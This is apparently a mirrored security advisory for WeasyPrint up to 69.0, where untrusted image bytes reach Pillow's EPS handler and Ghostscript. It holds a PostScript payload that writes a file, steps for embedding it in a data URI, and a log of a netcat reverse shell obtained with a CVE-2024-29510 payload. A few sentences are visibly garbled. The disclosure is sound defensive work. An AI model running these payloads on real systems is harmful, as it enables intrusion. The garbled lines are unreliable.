GHSA-r543-q48m-4c9j: Input Validation

Published Oct 7, 2026
·
Updated

Summary

This was found during a pentest, funded by the NLNnet foundation, conducted by Stefan Vink from Radically Open Security and the only High issue found.

WeasyPrint passes fetched image bytes directly to Pillow's generic format dispatcher without restricting the input format. When Ghostscript is installed on the host, Pillow's EpsImagePlugin invokes it to rasterize attacker-controlled EPS/PS input. Any content that can supply an image to WeasyPrint (an <img> URL, CSS image value, SVG image reference, or data URI) can therefore drive untrusted PostScript into an external interpreter. On hosts running a Ghostscript version with a known -dSAFER bypass, this yields remote code execution.

Details

The image pipeline reads an external response and hands the raw bytes to Pillow's format-agnostic Image.open, with no allowlist of safe raster formats:

with fetch(urlfetcher, url) as response: bytestring = response.read() mimetype = forcedmimetype or response.contenttype

...

pillowimage = Image.open(BytesIO(bytestring))

Pillow selects the handler from the byte signature. For EPS/PS input it selects PIL.EpsImagePlugin, which invokes Ghostscript to rasterize the input when a Ghostscript executable is available. Modern Ghostscript builds may run with -dSAFER, but that does not remove the interpreter boundary — it only constrains it, and multiple CVEs have bypassed it.

The defect in WeasyPrint is that it dispatches untrusted bytes to a format handler capable of invoking an external interpreter, without first validating that the input is a format whose safe handling WeasyPrint can guarantee.

- Input: an image URL in <img>, a CSS image value, an SVG image reference, or a data URI. - Sink: the Ghostscript invocation inside Pillow's PIL.EpsImagePlugin, reached from weasyprint/images.py:287-327.

Missing guards:

- No allowlist limits image input to safe raster formats (e.g. PNG, JPEG, WebP) before Pillow's format dispatch. - No interpreter-specific CPU, memory, filesystem, or process-isolation guard exists in this path.

Hosts without Ghostscript installed do not reach the EPS rasterization path; that is an environment dependency, not an input-format guard within WeasyPrint.

PoC

1. Construct a minimal EPS payload that proves the Ghostscript subprocess executes attacker-supplied PostScript. The following 201-byte payload writes a marker file:

postscript %!PS-Adobe-3.0 EPSF-3.0 %%BoundingBox: 0 0 100 100 (/tmp/test-marker.txt) (w) file dup (testGHOSTSCRIPTMARKER\n) writestring closefile 0.5 setgray 0 0 100 100 rectfill showpage %%EOF

1. The path /tmp/test-marker.txt is illustrative; a hardened reproduction writes the marker into a unique mode-0700 directory created with tempfile.mkdtemp. The write destination exists only to prove the Ghostscript subprocess executed user-supplied PostScript. 2. Embed the payload in a data:image/x-eps;base64,... URI inside an <img> element and render the document with WeasyPrint. The run requires no shell, network, reverse shell, or deployment endpoint. 3. Observe the outcome: record the Ghostscript version, the render return code, the generated PDF size, and the private marker file contents. On Ghostscript 10.05.1 this was constrained to the bounded file write above. 4. To confirm the full RCE chain, a down-rev Ghostscript 10.03.0 was invoked directly with the CVE-2024-29510 payload while a netcat listener ran on 127.0.0.1:4444. The Ghostscript subprocess connected back and dropped into an interactive shell within a 30-second window:

$ nc -lvnp 4444 127.0.0.1 & Ncat: Version 7.94 ( https://nmap.org/ncat ) Ncat: Listening on 127.0.0.1:4444

$ gs -dSAFER -dBATCH -dNOPAUSE -dPARANOIDSAFER -sDEVICE=ppmraw \ -sOutputFile=/dev/null - < cve-2024-29510payload.eps ... Ncat: Connection from 127.0.0.1:51884. bash: cannot set terminal process group (261755): Inappropriate ioctl for device bash: no job control in this shell tester@host:~$

4. A host without Ghostscript installed does not reach the EPS rasterization path.

Impact

This is a remote code execution vulnerability (via untrusted-input-to-external-interpreter dispatch).

- Rendering untrusted EPS through WeasyPrint on a host with Ghostscript installed executes attacker-controlled PostScript. On Ghostscript 10.05.1 the effded file write. - On a host running a Ghostscript version with a known -dSAFER bypass, the same input path yields full remote code execution — demonstrated with CVE-2024.03.0, which is still shipped in many LTS and end-of-life branches. - The unconditional defect in WeasyPrint is the missing image-format allowlist, which is what makes the interpreter reachable from untrusted input.

Who is impacted:

Any deployment that renders untrusted or partially-untrusted HTML/CSS/SVG through WeasyPrint on a host where Ghostscript is installed along combination on general-purpose document-rendering servers.

Affected Software

1 affected componentFixes available
pip/WeasyPrint<=69.0
70.0

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade pip/WeasyPrint to a version that resolves this vulnerability.

    Fixed in 70.0
  2. Configuration

    Restrict image input to safe raster formats such as PNG, JPEG, and WebP before Pillow's format dispatch, preventing untrusted EPS/PS input from reaching Ghostscript.

    WeasyPrint image pipeline image format allowlist = PNG, JPEG, WebP

Event History

Oct 7, 2026
Advisory Published
via GitHub·06:05 PM
Data Sourced
via GitHub·06:05 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

Which deployments are realistically exposed?

Deployments are exposed when WeasyPrint renders content that can reference attacker-supplied images, including img URLs, CSS image values, SVG image references, or data URIs, and Ghostscript is installed on the host. Remote code execution additionally depends on Ghostscript having a known -dSAFER bypass.

2

What does an attacker need to exploit this?

An attacker needs the ability to cause WeasyPrint to fetch or process an image they control. The supplied image must be EPS or PostScript so Pillow selects its EPS handler, which invokes Ghostscript to rasterize it.

3

How can I assess whether an environment is affected?

Check whether the application allows untrusted content to supply any of the supported image sources and whether Ghostscript is installed on the WeasyPrint host. Also determine whether that Ghostscript installation has a known -dSAFER bypass; the provided data does not identify specific Ghostscript versions.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203